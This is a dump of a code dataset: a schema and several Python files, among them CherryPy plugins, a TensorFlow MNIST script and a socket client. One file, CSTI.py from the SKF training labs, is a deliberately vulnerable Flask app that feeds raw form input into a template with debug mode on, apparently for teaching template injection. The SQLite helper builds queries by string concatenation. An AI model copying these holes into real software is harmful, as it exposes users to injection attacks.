Column schema (name: type, observed length/value range):

- blob_id: string, length 40
- directory_id: string, length 40
- path: string, length 2–616
- content_id: string, length 40
- detected_licenses: list, length 0–69
- license_type: string, 2 classes
- repo_name: string, length 5–118
- snapshot_id: string, length 40
- revision_id: string, length 40
- branch_name: string, length 4–63
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64, 2.91k–686M (nullable)
- star_events_count: int64, 0–209k
- fork_events_count: int64, 0–110k
- gha_license_id: string, 23 classes
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string, 213 classes
- src_encoding: string, 30 classes
- language: string, 1 class
- is_vendor: bool, 2 classes
- is_generated: bool, 2 classes
- length_bytes: int64, 2–10.3M
- extension: string, 246 classes
- content: string, length 2–10.3M
- authors: list, length 1
- author_id: string, length 0–212
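The rows below follow this schema. As a minimal sketch of how such a dump could be consumed, the snippet streams records with the Hugging Face `datasets` library and filters on a few of the columns listed above; the dataset identifier `org/python-code-dump` is a placeholder, since the source does not name the dataset.

```python
# Minimal sketch: stream rows matching the schema above and keep small,
# non-vendored Python files under a permissive license.
# NOTE: "org/python-code-dump" is a hypothetical dataset id.
from datasets import load_dataset

ds = load_dataset("org/python-code-dump", split="train", streaming=True)

for row in ds:
    if row["license_type"] != "permissive":
        continue
    if row["is_vendor"] or row["is_generated"]:
        continue
    if row["length_bytes"] > 10_000:
        continue
    print(row["repo_name"], row["path"], row["length_bytes"])
    break  # stop after the first match in this sketch
```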
7ae305ba58e2d8d511726e15f0b30b5e25e26026
|
4c97a552e8bbcc8f5d832a33322a12ebb5d23f47
|
/python programs/loops/printingrevnumswhile.py
|
c2334439d72aca6f3ec55ba062cac5ee88853d9e
|
[] |
no_license
|
amsenthilkumar/ZenClass
|
afe5d9e4faba2eef0fa5920330dbe642e3742e1c
|
c4bb4d1c1cdec8c6aa8e59181db9d4dd4447c5d8
|
refs/heads/master
| 2021-06-28T10:41:49.366282
| 2020-06-02T10:17:01
| 2020-06-02T10:17:01
| 222,610,812
| 0
| 0
| null | 2021-03-20T02:23:23
| 2019-11-19T04:49:16
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 46
|
py
|
n=int(input())
while(n>0):
    print(n)
    n=n-1
|
[
"noreply@github.com"
] |
amsenthilkumar.noreply@github.com
|
fd80c62ae71a5f4cfe50e2f3f303aeea7284c25a
|
0b821ce06a3afe7a0e76a8d48be2858bdb378818
|
/python/ctp_py/network.py
|
eaa3604408c58de20b56fdee0c09cd08fc439f09
|
[] |
no_license
|
reinhardtken/refresh_phone
|
def9d688575c7550b2aad21823f218ce82bb43fd
|
ff958d456a665031acac2e1f607100f533bdf554
|
refs/heads/master
| 2020-04-04T20:07:29.143771
| 2019-01-25T11:22:21
| 2019-01-25T11:22:21
| 156,234,788
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import Queue
import asyncore
import logging
import socket
#====================================
import asyn_pb_client
import asyn_pb_client_keepalive
#====================================


class Network:
    def __init__(self, queue, p1, p2):
        print("Network.init=======================================")
        self.queue = queue
        self.asyn_pb_client = None
        self.asyn_pb_client_keepalive = None
        if p1 is not None:
            self.asyn_pb_client = asyn_pb_client.ProtobufClient(p1)
            # If the connection is dropped, exit immediately
            self.asyn_pb_client.shutdown_when_close = True
        if p2 is not None:
            self.asyn_pb_client_keepalive = asyn_pb_client_keepalive.KeepAliveProtobufClient(p2)
        self.thread = threading.Thread(target=self.Work)

    def Run(self):
        self.thread.start()
        print('after start')

    def DealWithIncomeQueue(self):
        #print('DealWithIncomeQueue')
        while not self.queue.empty():
            msg = self.queue.get()
            self.asyn_pb_client.SendMsg(msg)
            self.queue.task_done()

    def Work(self):
        if self.asyn_pb_client is not None:
            self.asyn_pb_client.Connect()
        if self.asyn_pb_client_keepalive is not None:
            self.asyn_pb_client_keepalive.Connect()
        while True:  # self.asyn_pb_client.socket_map:
            asyncore.loop(timeout=1, count=1)
            self.DealWithIncomeQueue()

    def Join(self):
        self.thread.join()

#======================================
if __name__ == '__main__':
    network = Network()
    network.Run()
    network.Join()
|
[
"reinhardtken@hotmail.com"
] |
reinhardtken@hotmail.com
|
a44f128f58bb23a4c624266d368973bf055909f5
|
4491549f0b1bbf5397ae0b56192605a7abcb61b0
|
/python/CSTI/CSTI.py
|
93a1621d660fd0f88430767eabc3c4c4f68a8f2c
|
[
"Apache-2.0"
] |
permissive
|
iNoSec2/skf-labs
|
81e9d400ccac1007632add23bd50a094de1f50d5
|
8af9edc83e313be1578c5dee0fd4ecdf7ac18a32
|
refs/heads/master
| 2023-08-17T00:20:12.274684
| 2023-08-04T13:13:10
| 2023-08-04T13:13:10
| 235,376,119
| 0
| 0
|
Apache-2.0
| 2023-08-05T00:31:43
| 2020-01-21T15:33:01
|
Python
|
UTF-8
|
Python
| false
| false
| 528
|
py
|
from flask import Flask, request, render_template

app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config['DEBUG'] = True

@app.route("/")
def start():
    return render_template("index.html")

@app.route("/home", methods=['POST'])
def home():
    CSTI = request.form['string']
    return render_template("index.html", CSTI=CSTI)

@app.errorhandler(404)
def page_not_found(e):
    return render_template("404.html")

if __name__ == "__main__":
    app.run(host='0.0.0.0')
|
[
"glenntencate@gmail.com"
] |
glenntencate@gmail.com
|
2c2b3763a7ae0d0cf2cd41d323716587148d7e40
|
2821dc3c68598b82f80b8a3a97be424ac0ba6cb7
|
/lab4/tensorflow-keras/mnist_cnn.py
|
2278b8a659099dbf7901e27f4987ea1cc7b96b5f
|
[
"Apache-2.0"
] |
permissive
|
paolo-26/SLNN
|
a21d1c6fef3965b537908216ccf94628c7dce3b6
|
492801b3423f4268d2b1a46d504650e6e2263aca
|
refs/heads/master
| 2020-04-03T16:50:48.054721
| 2019-02-22T19:44:57
| 2019-02-22T19:44:57
| 155,421,477
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,780
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib.keras import layers
from tensorflow.contrib.keras import models
from tensorflow.contrib.keras import initializers
import sys
import argparse

# global flags for convenience
FLAGS = None

# Parameters
NUM_PIXELS = 28
NUM_CLASSES = 10
BATCH_SIZE = 50
TRAIN_STEPS = 500
NUM_FILTERS_1 = 100
NUM_FILTERS_2 = 50


def classifier_model():
    model = models.Sequential()
    model.add(layers.Conv2D(NUM_FILTERS_1, 3, strides=(2, 2),
              activation='relu', input_shape=(28, 28, 1), dilation_rate=(1, 1),
              padding='same', kernel_initializer=initializers.glorot_normal(),
              bias_initializer=initializers.Zeros()))
    model.add(layers.Conv2D(NUM_FILTERS_2, 3, strides=(2, 2),
              activation='relu', use_bias='True', dilation_rate=(1, 1),
              padding='same', kernel_initializer=initializers.glorot_normal(),
              bias_initializer=initializers.Zeros()))
    model.add(layers.Flatten())
    model.add(layers.Dense(10, use_bias='True',
              kernel_initializer=initializers.glorot_normal(),
              bias_initializer=initializers.Zeros()))
    return model


def train_and_test(_):
    # Check if log_dir exists, if so delete contents
    if tf.gfile.Exists(FLAGS.log_dir):
        tf.gfile.DeleteRecursively(FLAGS.log_dir)
    tf.gfile.MakeDirs(FLAGS.log_dir)
    # Import data
    mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True, reshape=False)
    # define placeholders for batch of training images and labels
    x = tf.placeholder(tf.float32, shape=(None, NUM_PIXELS, NUM_PIXELS, 1), name='input_data')
    y = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES), name='hot_vector')
    # create model
    my_mod = classifier_model()
    my_mod.summary()
    # use model on input image batch to compute logits
    h = my_mod(x)
    # define loss function
    loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=h)
    loss = tf.reduce_mean(loss, axis=0)
    # make the loss a "summary" to visualise it in tensorboard
    tf.summary.scalar('loss', loss)
    # define the optimizer and what it is optimizing
    optimizer = tf.train.GradientDescentOptimizer(0.5)
    train_step = optimizer.minimize(loss)
    # Measure accuracy on the batch and make it a summary for tensorboard.
    a = tf.argmax(y, axis=1)
    b = tf.argmax(h, axis=1)
    acc = tf.equal(a, b)
    acc = tf.cast(acc, tf.float32)
    accuracy = tf.reduce_mean(acc)
    tf.summary.scalar('accuracy', accuracy)
    # Create session.
    sess = tf.InteractiveSession()
    # Merge summaries for tensorboard.
    merged = tf.summary.merge_all()
    train_writer = tf.summary.FileWriter(FLAGS.log_dir + '/train', sess.graph)
    # Initialize variables.
    tf.global_variables_initializer().run()
    for i in range(1, TRAIN_STEPS):
        batch_xs, batch_ys = mnist.train.next_batch(BATCH_SIZE)
        summary_train, _ = sess.run([merged, train_step],
                                    feed_dict={x: batch_xs, y: batch_ys})
        train_writer.add_summary(summary_train, i)
    batch_xs, batch_ys = mnist.test.next_batch(10000)
    test_accuracy = sess.run(accuracy, feed_dict={x: batch_xs, y: batch_ys})
    print('Test accuracy: %.4f' % test_accuracy)

###################################################################################
if __name__ == '__main__':
    # use nice argparse module to parse cli arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('--data_dir', type=str, default='./data_dir/', help='Directory for training data')
    parser.add_argument('--log_dir', type=str, default='./log_dir/', help='Directory for Tensorboard event files')
    FLAGS, unparsed = parser.parse_known_args()
    # app.run is a simple wrapper that parses flags and sends them to main function
    tf.app.run(main=train_and_test, argv=[sys.argv[0]] + unparsed)
|
[
"paolo.1995@ymail.com"
] |
paolo.1995@ymail.com
|
bfa90fa5a9d82c7635b2671ee7a7af3ac54de232
|
e89aaf63a9593ff112708598b0f476c43599ead4
|
/cherrypy/process/plugins.py
|
4d7dcbfd48fb57aec8127f03a6abce5dd76a489a
|
[
"BSD-3-Clause"
] |
permissive
|
Vungle/cherrypy-3.2.4
|
60eb11c83efd803dc1c728602756d343ca9632a4
|
c4ef67a49a71445eb7caa9d94565cb5aace69699
|
refs/heads/master
| 2021-01-01T19:16:27.047678
| 2014-03-04T22:41:56
| 2014-03-04T22:41:56
| 16,367,063
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,827
|
py
|
"""Site services for use with a Web Site Process Bus."""
import os
import re
import signal as _signal
import sys
import time
import threading
from cherrypy._cpcompat import basestring, get_daemon, get_thread_ident
from cherrypy._cpcompat import ntob, set, Timer, SetDaemonProperty
# _module__file__base is used by Autoreload to make
# absolute any filenames retrieved from sys.modules which are not
# already absolute paths. This is to work around Python's quirk
# of importing the startup script and using a relative filename
# for it in sys.modules.
#
# Autoreload examines sys.modules afresh every time it runs. If an application
# changes the current directory by executing os.chdir(), then the next time
# Autoreload runs, it will not be able to find any filenames which are
# not absolute paths, because the current directory is not the same as when the
# module was first imported. Autoreload will then wrongly conclude the file
# has "changed", and initiate the shutdown/re-exec sequence.
# See ticket #917.
# For this workaround to have a decent probability of success, this module
# needs to be imported as early as possible, before the app has much chance
# to change the working directory.
_module__file__base = os.getcwd()
class SimplePlugin(object):
"""Plugin base class which auto-subscribes methods for known channels."""
bus = None
"""A :class:`Bus <cherrypy.process.wspbus.Bus>`, usually cherrypy.engine.
"""
def __init__(self, bus):
self.bus = bus
def subscribe(self):
"""Register this object as a (multi-channel) listener on the bus."""
for channel in self.bus.listeners:
# Subscribe self.start, self.exit, etc. if present.
method = getattr(self, channel, None)
if method is not None:
self.bus.subscribe(channel, method)
def unsubscribe(self):
"""Unregister this object as a listener on the bus."""
for channel in self.bus.listeners:
# Unsubscribe self.start, self.exit, etc. if present.
method = getattr(self, channel, None)
if method is not None:
self.bus.unsubscribe(channel, method)
class SignalHandler(object):
"""Register bus channels (and listeners) for system signals.
You can modify what signals your application listens for, and what it does
when it receives signals, by modifying :attr:`SignalHandler.handlers`,
a dict of {signal name: callback} pairs. The default set is::
handlers = {'SIGTERM': self.bus.exit,
'SIGHUP': self.handle_SIGHUP,
'SIGUSR1': self.bus.graceful,
}
The :func:`SignalHandler.handle_SIGHUP`` method calls
:func:`bus.restart()<cherrypy.process.wspbus.Bus.restart>`
if the process is daemonized, but
:func:`bus.exit()<cherrypy.process.wspbus.Bus.exit>`
if the process is attached to a TTY. This is because Unix window
managers tend to send SIGHUP to terminal windows when the user closes them.
Feel free to add signals which are not available on every platform.
The :class:`SignalHandler` will ignore errors raised from attempting
to register handlers for unknown signals.
"""
handlers = {}
"""A map from signal names (e.g. 'SIGTERM') to handlers (e.g. bus.exit)."""
signals = {}
"""A map from signal numbers to names."""
for k, v in vars(_signal).items():
if k.startswith('SIG') and not k.startswith('SIG_'):
signals[v] = k
del k, v
def __init__(self, bus):
self.bus = bus
# Set default handlers
self.handlers = {'SIGTERM': self.bus.exit,
'SIGHUP': self.handle_SIGHUP,
'SIGUSR1': self.bus.graceful,
}
if sys.platform[:4] == 'java':
del self.handlers['SIGUSR1']
self.handlers['SIGUSR2'] = self.bus.graceful
self.bus.log("SIGUSR1 cannot be set on the JVM platform. "
"Using SIGUSR2 instead.")
self.handlers['SIGINT'] = self._jython_SIGINT_handler
self._previous_handlers = {}
def _jython_SIGINT_handler(self, signum=None, frame=None):
# See http://bugs.jython.org/issue1313
self.bus.log('Keyboard Interrupt: shutting down bus')
self.bus.exit()
def subscribe(self):
"""Subscribe self.handlers to signals."""
for sig, func in self.handlers.items():
try:
self.set_handler(sig, func)
except ValueError:
pass
def unsubscribe(self):
"""Unsubscribe self.handlers from signals."""
for signum, handler in self._previous_handlers.items():
signame = self.signals[signum]
if handler is None:
self.bus.log("Restoring %s handler to SIG_DFL." % signame)
handler = _signal.SIG_DFL
else:
self.bus.log("Restoring %s handler %r." % (signame, handler))
try:
our_handler = _signal.signal(signum, handler)
if our_handler is None:
self.bus.log("Restored old %s handler %r, but our "
"handler was not registered." %
(signame, handler), level=30)
except ValueError:
self.bus.log("Unable to restore %s handler %r." %
(signame, handler), level=40, traceback=True)
def set_handler(self, signal, listener=None):
"""Subscribe a handler for the given signal (number or name).
If the optional 'listener' argument is provided, it will be
subscribed as a listener for the given signal's channel.
If the given signal name or number is not available on the current
platform, ValueError is raised.
"""
if isinstance(signal, basestring):
signum = getattr(_signal, signal, None)
if signum is None:
raise ValueError("No such signal: %r" % signal)
signame = signal
else:
try:
signame = self.signals[signal]
except KeyError:
raise ValueError("No such signal: %r" % signal)
signum = signal
prev = _signal.signal(signum, self._handle_signal)
self._previous_handlers[signum] = prev
if listener is not None:
self.bus.log("Listening for %s." % signame)
self.bus.subscribe(signame, listener)
def _handle_signal(self, signum=None, frame=None):
"""Python signal handler (self.set_handler subscribes it for you)."""
signame = self.signals[signum]
self.bus.log("Caught signal %s." % signame)
self.bus.publish(signame)
def handle_SIGHUP(self):
"""Restart if daemonized, else exit."""
if os.isatty(sys.stdin.fileno()):
# not daemonized (may be foreground or background)
self.bus.log("SIGHUP caught but not daemonized. Exiting.")
self.bus.exit()
else:
self.bus.log("SIGHUP caught while daemonized. Restarting.")
self.bus.restart()
try:
import pwd
import grp
except ImportError:
pwd, grp = None, None
class DropPrivileges(SimplePlugin):
"""Drop privileges. uid/gid arguments not available on Windows.
Special thanks to `Gavin Baker <http://antonym.org/2005/12/dropping-privileges-in-python.html>`_
"""
def __init__(self, bus, umask=None, uid=None, gid=None):
SimplePlugin.__init__(self, bus)
self.finalized = False
self.uid = uid
self.gid = gid
self.umask = umask
def _get_uid(self):
return self._uid
def _set_uid(self, val):
if val is not None:
if pwd is None:
self.bus.log("pwd module not available; ignoring uid.",
level=30)
val = None
elif isinstance(val, basestring):
val = pwd.getpwnam(val)[2]
self._uid = val
uid = property(_get_uid, _set_uid,
doc="The uid under which to run. Availability: Unix.")
def _get_gid(self):
return self._gid
def _set_gid(self, val):
if val is not None:
if grp is None:
self.bus.log("grp module not available; ignoring gid.",
level=30)
val = None
elif isinstance(val, basestring):
val = grp.getgrnam(val)[2]
self._gid = val
gid = property(_get_gid, _set_gid,
doc="The gid under which to run. Availability: Unix.")
def _get_umask(self):
return self._umask
def _set_umask(self, val):
if val is not None:
try:
os.umask
except AttributeError:
self.bus.log("umask function not available; ignoring umask.",
level=30)
val = None
self._umask = val
umask = property(
_get_umask,
_set_umask,
doc="""The default permission mode for newly created files and
directories.
Usually expressed in octal format, for example, ``0644``.
Availability: Unix, Windows.
""")
def start(self):
# uid/gid
def current_ids():
"""Return the current (uid, gid) if available."""
name, group = None, None
if pwd:
name = pwd.getpwuid(os.getuid())[0]
if grp:
group = grp.getgrgid(os.getgid())[0]
return name, group
if self.finalized:
if not (self.uid is None and self.gid is None):
self.bus.log('Already running as uid: %r gid: %r' %
current_ids())
else:
if self.uid is None and self.gid is None:
if pwd or grp:
self.bus.log('uid/gid not set', level=30)
else:
self.bus.log('Started as uid: %r gid: %r' % current_ids())
if self.gid is not None:
os.setgid(self.gid)
os.setgroups([])
if self.uid is not None:
os.setuid(self.uid)
self.bus.log('Running as uid: %r gid: %r' % current_ids())
# umask
if self.finalized:
if self.umask is not None:
self.bus.log('umask already set to: %03o' % self.umask)
else:
if self.umask is None:
self.bus.log('umask not set', level=30)
else:
old_umask = os.umask(self.umask)
self.bus.log('umask old: %03o, new: %03o' %
(old_umask, self.umask))
self.finalized = True
# This is slightly higher than the priority for server.start
# in order to facilitate the most common use: starting on a low
# port (which requires root) and then dropping to another user.
start.priority = 77
class Daemonizer(SimplePlugin):
"""Daemonize the running script.
Use this with a Web Site Process Bus via::
Daemonizer(bus).subscribe()
When this component finishes, the process is completely decoupled from
the parent environment. Please note that when this component is used,
the return code from the parent process will still be 0 if a startup
error occurs in the forked children. Errors in the initial daemonizing
process still return proper exit codes. Therefore, if you use this
plugin to daemonize, don't use the return code as an accurate indicator
of whether the process fully started. In fact, that return code only
indicates if the process succesfully finished the first fork.
"""
def __init__(self, bus, stdin='/dev/null', stdout='/dev/null',
stderr='/dev/null'):
SimplePlugin.__init__(self, bus)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.finalized = False
def start(self):
if self.finalized:
self.bus.log('Already deamonized.')
# forking has issues with threads:
# http://www.opengroup.org/onlinepubs/000095399/functions/fork.html
# "The general problem with making fork() work in a multi-threaded
# world is what to do with all of the threads..."
# So we check for active threads:
if threading.activeCount() != 1:
self.bus.log('There are %r active threads. '
'Daemonizing now may cause strange failures.' %
threading.enumerate(), level=30)
# See http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
# (or http://www.faqs.org/faqs/unix-faq/programmer/faq/ section 1.7)
# and http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
# Finish up with the current stdout/stderr
sys.stdout.flush()
sys.stderr.flush()
# Do first fork.
try:
pid = os.fork()
if pid == 0:
# This is the child process. Continue.
pass
else:
# This is the first parent. Exit, now that we've forked.
self.bus.log('Forking once.')
os._exit(0)
except OSError:
# Python raises OSError rather than returning negative numbers.
exc = sys.exc_info()[1]
sys.exit("%s: fork #1 failed: (%d) %s\n"
% (sys.argv[0], exc.errno, exc.strerror))
os.setsid()
# Do second fork
try:
pid = os.fork()
if pid > 0:
self.bus.log('Forking twice.')
os._exit(0) # Exit second parent
except OSError:
exc = sys.exc_info()[1]
sys.exit("%s: fork #2 failed: (%d) %s\n"
% (sys.argv[0], exc.errno, exc.strerror))
os.chdir("/")
os.umask(0)
si = open(self.stdin, "r")
so = open(self.stdout, "a+")
se = open(self.stderr, "a+")
# os.dup2(fd, fd2) will close fd2 if necessary,
# so we don't explicitly close stdin/out/err.
# See http://docs.python.org/lib/os-fd-ops.html
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
self.bus.log('Daemonized to PID: %s' % os.getpid())
self.finalized = True
start.priority = 65
class PIDFile(SimplePlugin):
"""Maintain a PID file via a WSPBus."""
def __init__(self, bus, pidfile):
SimplePlugin.__init__(self, bus)
self.pidfile = pidfile
self.finalized = False
def start(self):
pid = os.getpid()
if self.finalized:
self.bus.log('PID %r already written to %r.' % (pid, self.pidfile))
else:
open(self.pidfile, "wb").write(ntob("%s\n" % pid, 'utf8'))
self.bus.log('PID %r written to %r.' % (pid, self.pidfile))
self.finalized = True
start.priority = 70
def exit(self):
try:
os.remove(self.pidfile)
self.bus.log('PID file removed: %r.' % self.pidfile)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
class PerpetualTimer(Timer):
"""A responsive subclass of threading.Timer whose run() method repeats.
Use this timer only when you really need a very interruptible timer;
this checks its 'finished' condition up to 20 times a second, which can
results in pretty high CPU usage
"""
def __init__(self, *args, **kwargs):
"Override parent constructor to allow 'bus' to be provided."
self.bus = kwargs.pop('bus', None)
super(PerpetualTimer, self).__init__(*args, **kwargs)
def run(self):
while True:
self.finished.wait(self.interval)
if self.finished.isSet():
return
try:
self.function(*self.args, **self.kwargs)
except Exception:
if self.bus:
self.bus.log(
"Error in perpetual timer thread function %r." %
self.function, level=40, traceback=True)
# Quit on first error to avoid massive logs.
raise
class BackgroundTask(SetDaemonProperty, threading.Thread):
"""A subclass of threading.Thread whose run() method repeats.
Use this class for most repeating tasks. It uses time.sleep() to wait
for each interval, which isn't very responsive; that is, even if you call
self.cancel(), you'll have to wait until the sleep() call finishes before
the thread stops. To compensate, it defaults to being daemonic, which means
it won't delay stopping the whole process.
"""
def __init__(self, interval, function, args=[], kwargs={}, bus=None):
threading.Thread.__init__(self)
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.running = False
self.bus = bus
# default to daemonic
self.daemon = True
def cancel(self):
self.running = False
def run(self):
self.running = True
while self.running:
time.sleep(self.interval)
if not self.running:
return
try:
self.function(*self.args, **self.kwargs)
except Exception:
if self.bus:
self.bus.log("Error in background task thread function %r."
% self.function, level=40, traceback=True)
# Quit on first error to avoid massive logs.
raise
class Monitor(SimplePlugin):
"""WSPBus listener to periodically run a callback in its own thread."""
callback = None
"""The function to call at intervals."""
frequency = 60
"""The time in seconds between callback runs."""
thread = None
"""A :class:`BackgroundTask<cherrypy.process.plugins.BackgroundTask>`
thread.
"""
def __init__(self, bus, callback, frequency=60, name=None):
SimplePlugin.__init__(self, bus)
self.callback = callback
self.frequency = frequency
self.thread = None
self.name = name
def start(self):
"""Start our callback in its own background thread."""
if self.frequency > 0:
threadname = self.name or self.__class__.__name__
if self.thread is None:
self.thread = BackgroundTask(self.frequency, self.callback,
bus=self.bus)
self.thread.setName(threadname)
self.thread.start()
self.bus.log("Started monitor thread %r." % threadname)
else:
self.bus.log("Monitor thread %r already started." % threadname)
start.priority = 70
def stop(self):
"""Stop our callback's background task thread."""
if self.thread is None:
self.bus.log("No thread running for %s." %
self.name or self.__class__.__name__)
else:
if self.thread is not threading.currentThread():
name = self.thread.getName()
self.thread.cancel()
if not get_daemon(self.thread):
self.bus.log("Joining %r" % name)
self.thread.join()
self.bus.log("Stopped thread %r." % name)
self.thread = None
def graceful(self):
"""Stop the callback's background task thread and restart it."""
self.stop()
self.start()
class Autoreloader(Monitor):
"""Monitor which re-executes the process when files change.
This :ref:`plugin<plugins>` restarts the process (via :func:`os.execv`)
if any of the files it monitors change (or is deleted). By default, the
autoreloader monitors all imported modules; you can add to the
set by adding to ``autoreload.files``::
cherrypy.engine.autoreload.files.add(myFile)
If there are imported files you do *not* wish to monitor, you can
adjust the ``match`` attribute, a regular expression. For example,
to stop monitoring cherrypy itself::
cherrypy.engine.autoreload.match = r'^(?!cherrypy).+'
Like all :class:`Monitor<cherrypy.process.plugins.Monitor>` plugins,
the autoreload plugin takes a ``frequency`` argument. The default is
1 second; that is, the autoreloader will examine files once each second.
"""
files = None
"""The set of files to poll for modifications."""
frequency = 1
"""The interval in seconds at which to poll for modified files."""
match = '.*'
"""A regular expression by which to match filenames."""
def __init__(self, bus, frequency=1, match='.*'):
self.mtimes = {}
self.files = set()
self.match = match
Monitor.__init__(self, bus, self.run, frequency)
def start(self):
"""Start our own background task thread for self.run."""
if self.thread is None:
self.mtimes = {}
Monitor.start(self)
start.priority = 70
def sysfiles(self):
"""Return a Set of sys.modules filenames to monitor."""
files = set()
for k, m in sys.modules.items():
if re.match(self.match, k):
if (
hasattr(m, '__loader__') and
hasattr(m.__loader__, 'archive')
):
f = m.__loader__.archive
else:
f = getattr(m, '__file__', None)
if f is not None and not os.path.isabs(f):
# ensure absolute paths so a os.chdir() in the app
# doesn't break me
f = os.path.normpath(
os.path.join(_module__file__base, f))
files.add(f)
return files
def run(self):
"""Reload the process if registered files have been modified."""
for filename in self.sysfiles() | self.files:
if filename:
if filename.endswith('.pyc'):
filename = filename[:-1]
oldtime = self.mtimes.get(filename, 0)
if oldtime is None:
# Module with no .py file. Skip it.
continue
try:
mtime = os.stat(filename).st_mtime
except OSError:
# Either a module with no .py file, or it's been deleted.
mtime = None
if filename not in self.mtimes:
# If a module has no .py file, this will be None.
self.mtimes[filename] = mtime
else:
if mtime is None or mtime > oldtime:
# The file has been deleted or modified.
self.bus.log("Restarting because %s changed." %
filename)
self.thread.cancel()
self.bus.log("Stopped thread %r." %
self.thread.getName())
self.bus.restart()
return
class ThreadManager(SimplePlugin):
"""Manager for HTTP request threads.
If you have control over thread creation and destruction, publish to
the 'acquire_thread' and 'release_thread' channels (for each thread).
This will register/unregister the current thread and publish to
'start_thread' and 'stop_thread' listeners in the bus as needed.
If threads are created and destroyed by code you do not control
(e.g., Apache), then, at the beginning of every HTTP request,
publish to 'acquire_thread' only. You should not publish to
'release_thread' in this case, since you do not know whether
the thread will be re-used or not. The bus will call
'stop_thread' listeners for you when it stops.
"""
threads = None
"""A map of {thread ident: index number} pairs."""
def __init__(self, bus):
self.threads = {}
SimplePlugin.__init__(self, bus)
self.bus.listeners.setdefault('acquire_thread', set())
self.bus.listeners.setdefault('start_thread', set())
self.bus.listeners.setdefault('release_thread', set())
self.bus.listeners.setdefault('stop_thread', set())
def acquire_thread(self):
"""Run 'start_thread' listeners for the current thread.
If the current thread has already been seen, any 'start_thread'
listeners will not be run again.
"""
thread_ident = get_thread_ident()
if thread_ident not in self.threads:
# We can't just use get_ident as the thread ID
# because some platforms reuse thread ID's.
i = len(self.threads) + 1
self.threads[thread_ident] = i
self.bus.publish('start_thread', i)
def release_thread(self):
"""Release the current thread and run 'stop_thread' listeners."""
thread_ident = get_thread_ident()
i = self.threads.pop(thread_ident, None)
if i is not None:
self.bus.publish('stop_thread', i)
def stop(self):
"""Release all threads and run all 'stop_thread' listeners."""
for thread_ident, i in self.threads.items():
self.bus.publish('stop_thread', i)
self.threads.clear()
graceful = stop
|
[
"ben.reiter@vungle.com"
] |
ben.reiter@vungle.com
|
3cb2017e792254a5cf2a3c9db8253320af6ea929
|
8ae4f2696299e86032e2debfea39d586934ab170
|
/database/_database/python_files/function_stack_update.py
|
ba0409db14935d6038bfcd570817ba47e177fd51
|
[
"MIT"
] |
permissive
|
gendry/solpybas
|
a5dd9592a59f3a9a25533e8b3502412ae5f1c2dd
|
1ff8554f0871994871a0878464fac5bb47428d1d
|
refs/heads/master
| 2020-06-01T20:54:09.352841
| 2019-07-23T16:20:58
| 2019-07-23T16:20:58
| 190,923,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,475
|
py
|
import sqlite3

#This generically adds stuff to the depositions / treatments and dep_conds / treatmetn_conds tables...
def stack_update_function(self, conn, dsp_lst, stack_dict, device_stack_id):
    status = 'No status yet'
    #TABLE device_stacks (id INTEGER PRIMARY KEY, stack_name TEXT, bot_elec_pat INTEGER, top_elec_pat INTEGER)
    #TABLE device_stack_parts (id INTEGER PRIMARY KEY, device_stack_id INTEGER, stack_name TEXT, type_id INTEGER, part_id INTEGER)
    #This will be the new device_stacks_part id
    device_stacks_part_max_id = conn.execute('SELECT max(id) FROM device_stack_parts')
    device_stacks_part_max_id_result = device_stacks_part_max_id.fetchone()[0]
    #if an id exists increment it to use for later inserts or use 0 if not
    #this won't work if there is only one record i.e. returns a zero
    #convert to string to test truth value
    string_device_stacks_part_max_id_result = str(device_stacks_part_max_id_result)
    if string_device_stacks_part_max_id_result == 'None':
        device_stacks_part_id = 0
    else:
        device_stacks_part_id = device_stacks_part_max_id_result + 1
    conn.execute('UPDATE device_stacks SET top_elec_pat = ?, bot_elec_pat = ? WHERE id = ?', (stack_dict['top_elec_pat'],stack_dict['bot_elec_pat'],device_stack_id,));
    #The dsp_lst contains a list of dicts with the entries for the commit to dsp table
    for dsp_dict in dsp_lst:
        dsp_dict['device_stack_id'] = device_stack_id
        conn.execute("INSERT INTO device_stack_parts (id) VALUES (?)", (device_stacks_part_id,));
        #build a search statement to use later as go through the values
        #there must be a nicer way...
        search_statement = "SELECT id FROM device_stack_parts WHERE "
        search_statement_and = ''
        search_statement_list = []
        #find the names of the columns in the table returns a list of tuples
        search_test = conn.execute("pragma table_info('device_stack_parts')");
        test = search_test.fetchall()
        column_dict = {}
        for i in test:
            column_dict['%s' % str(i[1])] = None
        del column_dict['id']
        for key in dsp_dict:
            answer = dsp_dict['%s' % key]
            column_dict['%s' % key] = answer
        for key, value in column_dict.iteritems():
            if value == None:
                conn.execute("UPDATE device_stack_parts SET "+key+" = ? WHERE id = ?", (value, device_stacks_part_id,));
                search_statement_and = search_statement_and + ' AND ' + key + ' IS NULL'
            else:
                conn.execute("UPDATE device_stack_parts SET "+key+" = ? WHERE id = ?", (value, device_stacks_part_id,));
                search_statement_and = search_statement_and + ' AND ' + key + ' = ?'
                search_statement_list.append(value)
        #Dont bother checking...
        #search_statement = search_statement + search_statement_and[4:]
        #search_statement_list = tuple(search_statement_list)
        #search_results = conn.execute(search_statement, search_statement_list);
        #result = search_results.fetchall()
        #result = [i[0] for i in result]
        #if len(result) < 2:
